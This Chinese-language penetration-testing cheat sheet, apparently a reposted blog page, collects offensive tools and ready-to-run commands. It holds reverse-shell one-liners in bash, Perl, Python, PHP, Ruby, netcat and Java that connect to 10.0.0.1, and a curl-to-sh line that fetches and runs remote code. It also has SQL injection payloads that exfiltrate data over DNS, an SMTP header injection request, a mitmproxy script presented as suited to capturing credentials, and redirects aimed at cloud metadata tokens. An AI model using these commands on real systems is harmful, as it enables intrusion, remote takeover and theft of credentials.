# Singularity of Origin 是一个执行 DNS 重新绑定攻击的工具。它包括将攻击服务器 DNS 名称的 IP 地址重新绑定到目标机器的 IP 地址以及提供攻击有效载荷以利用目标机器上易受攻击的软件的必要组件。

https://github.com/brannondorsey/dns-rebind-toolkit
# DNS Rebind Toolkit 是一个前端 JavaScript 框架，用于开发针对局域网 (LAN) 上易受攻击的主机和服务的 DNS 重新绑定漏洞。

https://github.com/branondorsey/whonow
# 一个恶意的 DNS 服务器，用于即时执行 DNS 重新绑定攻击。

https://nip.io
# 任何 IP 地址的简单通配符 DNS

https://sslip.io
# sslip.io 是一种 DNS（域名系统）服务，当使用带有嵌入式 IP 地址的主机名进行查询时，会返回该 IP 地址。

http://1u.ms/
# 这是一小组零配置 DNS 实用程序，用于协助检测和利用 SSRF 相关漏洞。它提供了易于使用的 DNS 重新绑定实用程序，以及一种获取具有任何给定内容的可解析资源记录的方法。

SMTP 标头注入

https://www.acunetix.com/blog/articles/email-header-injection/
# Web 页面和 Web 应用程序的常见做法是实现联系表单，然后将电子邮件消息发送给预期的收件人。大多数情况下，此类联系表单会设置标题。这些标头由 Web 服务器上的电子邮件库解释并转换为生成的 SMTP 命令，然后由 SMTP 服务器处理。

POST /contact.php HTTP/1.1
Host: www.example2.com

name=Best Product\nbcc: [email protected]&[email protected]&message=Buy my product!

反弹shell

http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet
# 如果你有幸在渗透测试中发现了命令执行漏洞，那么不久之后你可能会想要一个交互式 shell .
# hit

bash -i >& /dev/tcp/10.0.0.1/8080 0>&1

# PERL

perl -e 'use Socket;$i="10.0.0.1";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

＃ Python

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

# PHP

php -r '$sock=fsockopen("10.0.0.1",1234);exec("/bin/sh -i <&3 >&3 2>&3");'

#ruby

ruby -rsocket -e'f=TCPSocket.open("10.0.0.1",1234).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)

#NetCat

nc -e /bin/sh 10.0.0.1 1234
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 1234 >/tmp/f

#java

r = Runtime.getRuntime()
p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/10.0.0.1/2002;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[])
p.waitFor()

# xterm

xterm -display 10.0.0.1:1
Xnest :1
xhost +targetip

https://reverse-shell.sh/
# 反向 Shell 即服务

nc -l 1337
curl https://reverse-shell.sh/yourip:1337 | sh

https://github.com/calebstewart/pwncat
# pwncat 是 Linux 目标的后开发平台。

SQLi（SQL 注入）

https://arxiv.org/abs/1303.3047
# 本文描述了一种高级 SQL 注入技术，其中利用 DNS 解析过程来检索恶意 SQL 查询结果。

# Oracle

'||(SELECT%20UTL_INADDR.GET_HOST_ADDRESS('xpto.example.com'))||'
'||(SELECT%20UTL_HTTP.REQUEST('http://xpto.example.com')%20FROM%20DUAL)||'
'||(SELECT%20HTTPURITYPE('http://xpto.example.com').GETCLOB()%20FROM%20DUAL)||'
'||(SELECT%20DBMS_LDAP.INIT(('xpto.example.com',80)%20FROM%20DUAL)||'

# MySQL

'||(SELECT%20LOAD_FILE('\\xpto.example.com'))||'

# Microsoft SQL Server

'+;EXEC('master..xp_dirtree"\\xpto.example.com\"');+'
'+;EXEC('master..xp_fileexist"\\xpto.example.com\"');+'
'+;EXEC('master..xp_subdirs"\\xpto.example.com\"');+'

# PostgreSQL

'||;COPY%20users(names)%20FROM%20'\\xpto.example.com\';||'

SSTI（服务器端模板注入）

https://www.youtube.com/watch?v=SN6EVIG4c-0
# 10 分钟内的模板注入 (SSTI)

https://portswigger.net/research/server-side-template-injection
# Web 应用程序广泛使用模板引擎来通过网页和电子邮件呈现动态数据。在模板中不安全地嵌入用户输入会导致服务器端模板注入，这是一个非常容易被误认为跨站点脚本 (XSS) 或完全遗漏的严重漏洞。与 XSS 不同，模板注入可用于直接攻击 Web 服务器的内部，并经常获得远程代码执行 (RCE)，将每个易受攻击的应用程序变成潜在的支点。

https://github.com/epinna/tplmap
# Tplmap 通过多种沙箱转义技术帮助利用代码注入和服务器端模板注入漏洞来访问底层操作系统。

tplmap.py --os-shell -u 'http://www.example.com/page?name=John'

WebDAV（Web 分布式创作和版本控制）

http://www.webdav.org/cadaver/
#cadaver 是 Unix 的命令行 WebDAV 客户端。

https://github.com/cldrn/davtest
# 该程序试图利用启用 WebDAV 的服务器。

通用工具

https://gchq.github.io/Cyber​​Chef/
https://www.ddosi.org/code
# 网络瑞士军刀

https://packettotal.com/
# Pcap 分析和示例

一般的

# 只打印任何 curl 方法的响应头

curl -skSL -D - https://www.example.com -o /dev/null

# 纯 bash 多线程脚本

#!/bin/bash

FILE="${1}"
THREADS="${2}"
TIMEOUT="${3}"
CMD="${4}"
NUM=$(wc -l ${FILE} | awk '{ print $1 }')
THREAD=0
NUMDOM=0
while read SUBDOMAIN; do
        PIDSTAT=0
        if [ $THREAD -lt $THREADS ]; then
                eval timeout ${TIMEOUT} ${CMD} 2>/dev/null &
                PIDS[$THREAD]="${!}"
                let THREAD++
                let NUMDOM++
                echo -ne "\r>Progress: ${NUMDOM} of ${NUM} ($(awk "BEGIN {printf \"%0.2f\",(${NUMDOM}*100)/${NUM}}")%)\r"
        else
                while [ ${PIDSTAT} -eq 0 ]; do
                        for j in "${!PIDS[@]}"; do
                                kill -0 "${PIDS[j]}" > /dev/null 2>&1
                                PIDSTAT="${?}"
                                if [ ${PIDSTAT} -ne 0 ]; then
                                        eval timeout ${TIMEOUT} ${CMD} 2>/dev/null &
                                        PIDS[j]="${!}"
                                        let NUMDOM++
                                        echo -ne "\r>Progress: ${NUMDOM} of ${NUM} ($(awk "BEGIN {printf \"%0.2f\",(${NUMDOM}*100)/${NUM}}")%)\r"
                                        break
                                fi
                        done
                done
        fi
done < ${FILE}
wait

# 反向代理

mitmdump --certs ~/cert/cert.pem --listen-port 443 --scripts script.py --set block_global=false --mode reverse:https://example.com/

# 适合捕获凭据

$ cat script.py
import mitmproxy.http
from mitmproxy import ctx

def request(flow):
    if flow.request.method == "POST":
        ctx.log.info(flow.request.get_text())

# 虚假HTTP 服务

while true ; do echo -e "HTTP/1.1 200 OK\nContent-Length: 0\n\n" | nc -vl 1.2.3.4 80; done
socat -v -d -d TCP-LISTEN:80,crlf,reuseaddr,fork 'SYSTEM:/bin/echo "HTTP/1.1 200 OK";/bin/echo "Content-Length: 2";/bin/echo;/bin/echo "OK"'
socat -v -d -d TCP-LISTEN:80,crlf,reuseaddr,fork 'SYSTEM:/bin/echo "HTTP/1.1 302 Found";/bin/echo "Content-Length: 0";/bin/echo "Location: http://metadata.google.internal/computeMetadata/v1beta1/instance/service-accounts/default/token";/bin/echo;/bin/echo'
FILE=image.jpg;socat -v -d -d TCP-LISTEN:80,fork "SYSTEM:/bin/echo 'HTTP/1.1 200 OK';/bin/echo 'Content-Length: '`wc -c<$FILE`;/bin/echo 'Content-Type: image/png';/bin/echo;dd 2>/dev/null<$FILE" # Present an image
python2 -m SimpleHTTPServer 8080
python3 -m http.server 8080
php -S 0.0.0.0:80
ruby -run -e httpd . -p 80
busybox httpd -f -p 80

# 假 HTTPS 服务器

openssl req -new -x509 -keyout test.key -out test.crt -nodes
cat test.key test.crt > test.pem
socat -v -d -d openssl-listen:443,crlf,reuseaddr,cert=test.pem,verify=0,fork 'SYSTEM:/bin/echo "HTTP/1.1 200 OK";/bin/echo "Content-Length: 2";/bin/echo;/bin/echo "OK"'
socat -v -d -d openssl-listen:443,crlf,reuseaddr,cert=web.pem,verify=0,fork 'SYSTEM:/bin/echo "HTTP/1.1 302 Found";/bin/echo "Content-Length: 0";/bin/echo "Location: http://metadata.google.internal/computeMetadata/v1beta1/instance/service-accounts/default/token";/bin/echo;/bin/echo'
stunnel stunnel.conf # 检查https://www.stunnel.org/

# Python 3 简单的 HTTPS 服务器

    import http.server, ssl
    server_address = ('0.0.0.0', 443)
    httpd = http.server.HTTPServer(server_address, http.server.SimpleHTTPRequestHandler)
    httpd.socket = ssl.wrap_socket(httpd.socket, server_side=True, certfile='/path/cert.pem', ssl_version=ssl.PROTOCOL_TLS)
    httpd.serve_forever()

# 假FTP服务器

python -m pyftpdlib --directory=/tmp/dir/ --port=21

# 检查 HTTP 或 HTTPS

while read i; do curl -m 15 -ki http://$i &> /dev/null; if [ $? -eq 0 ]; then echo $i; fi; done < subdomains.txt
while read i; do curl -m 15 -ki https://$i &> /dev/null; if [ $? -eq 0 ]; then echo $i; fi; done < subdomains.txt

# 十个并行请求

xargs -I % -P 10 curl -H 'Connection: close' -s -D - -o /dev/null https://example.com < <(printf '%s\n' {1..10000})

# 直接通过IP地址访问目标

http://1.2.3.4
https://1.2.3.4

# 在 bash 变量上去除空格和换行符

"${i//[$'\t\r\n ']}"

https://gtfobins.github.io/
# GTFOBins 是 Unix 二进制文件的精选列表，可用于绕过错误配置系统中的本地安全限制。

https://www.guyrutenberg.com/2014/05/02/make-offline-mirror-of-a-site-using-wget/
# 使用 wget 制作站点的离线镜像

wget -mkEpnp https://www.example.com/

# Referer欺骗

<base href="https://www.google.com/">
<style>
@import 'https://CSRF.vulnerable.example/';
</style>

https://blog.orange.tw/2019/07/attacking-ssl-vpn-part-1-preauth-rce-on-palo-alto.html
# 在 Palo Alto GlobalProtect 上检查 PreAuth RCE

time curl -s -d 'scep-profile-name=%9999999c' https://${HOST}/sslmgr >/dev/null
time curl -s -d 'scep-profile-name=%99999999c' https://${HOST}/sslmgr >/dev/null
time curl -s -d 'scep-profile-name=%999999999c' https://${HOST}/sslmgr >/dev/null

https://blog.orange.tw/2018/08/how-i-chained-4-bugs-features-into-rce-on-amazon.html
# 我如何在 Amazon Collaboration 上将 4 个错误（功能？）链接到 RCE 中系统（绕过 /..;/）

https://docs.google.com/presentation/d/1jqnpPe0A7L_cVuPe1V0XeW6LOHvMYg5PBqHd96SScJ8/
#路由到另一个后端，值得花几个小时在它的灵感来自@samwcyo的谈话“攻击次要上下文，我已经收集了网络应用程序” PWN 这个后端的东西。

https://medium.com/@ricardoiramar/reusing-cookies-23ed4691122b
# 这是一个故事，我只是通过在来自同一 Web 应用程序的不同子域上重用 cookie 偶然发现了类似 Web 应用程序的常见漏洞。

https://github.com/shieldfy/API-Security-Checklist
# 设计、测试和发布 API 时最重要的安全对策清单。

from

转载请注明出处及链接